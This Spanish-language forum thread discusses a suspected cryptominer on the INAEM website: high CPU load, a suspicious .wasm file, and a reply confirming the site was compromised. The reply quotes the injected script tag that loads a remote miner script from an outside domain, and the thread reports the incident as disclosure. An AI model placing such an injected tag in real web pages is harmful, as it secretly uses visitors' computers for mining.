¿Posible minero en la web del INAEM ?

Iniciado por HardC0d3, 11 Junio 2018, 23:18 PM

0 Miembros y 1 Visitante están viendo este tema.

HardC0d3

Buenas foro !!

¿Es posible que la web de INAEM tenga un minero?


Al acceder en su página web https://inaem.aragon.es/ el procesador se pone al 100%




Creo que lo que causa este comportamiento es el fichero .wasm cuando se hace la petición a https://www.freecontent.trade./LSQLGnCi.wasm




uBlock Origin no me bloquea nada pero al analizar el archivo LSQLGnCi.wasm en VirusTotal da los siguientes resultados:




Por lo que veo en la wikipedia un fichero .wasm es un formato de código binario portable, para la ejecución íntegra en navegador de scripts de lado del cliente.

https://es.wikipedia.org/wiki/WebAssembly
Citar
WebAssembly, abreviado wasm, es un formato de código binario portable (bytecode), para la ejecución íntegra en navegador de scripts de lado del cliente.

Se trata de un lenguaje de bajo nivel, diseñado inicialmente como formato destino en la compilación desde C y C++. Aunque también soporta código fuente de otros lenguajes, como Rust.

WebAssembly se concibe como una máquina de pila portable, diseñado así para procesarse sintácticamente más rápido que javascript, y mejorar su velocidad de ejecución.

WebAssembly fue anunciado el 17 de junio de 2015. El 15 de marzo de 2016 se hizo una demo ejecutando Unity's Angry Bots en Firefox, Chromium, Google Chrome, y Microsoft Edge

La implementación inicial de soporte para WebAssembly en navegadores se basará en los formatos asm.js, soportado por Mozilla, y PNaCl (Portable Native Client), propuesto por Google. Tras sacar una versión MVP se plantea incorporar recolección de basura,7​ lo que permitirá a lenguajes con este sistema, tales como Java o C# compilarse generando código wasm.

El equipo implicado en el desarrollo de WebAssembly incluye personas vinculadas a Mozilla, Microsoft, Google o Apple.


A ver si alguien mas experto puede arrojar algo de luz al tema.

#!drvy

Efectivamente, tienen un miner. Parece ser que han sido comprometidos y les han modificado el template en varios sitios para que ejecute este script:

Código (html5) [Seleccionar]
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>

Saludos

HardC0d3

Gracias #!drvy por confirmarlo. Ya está reportado.

Un saludo!!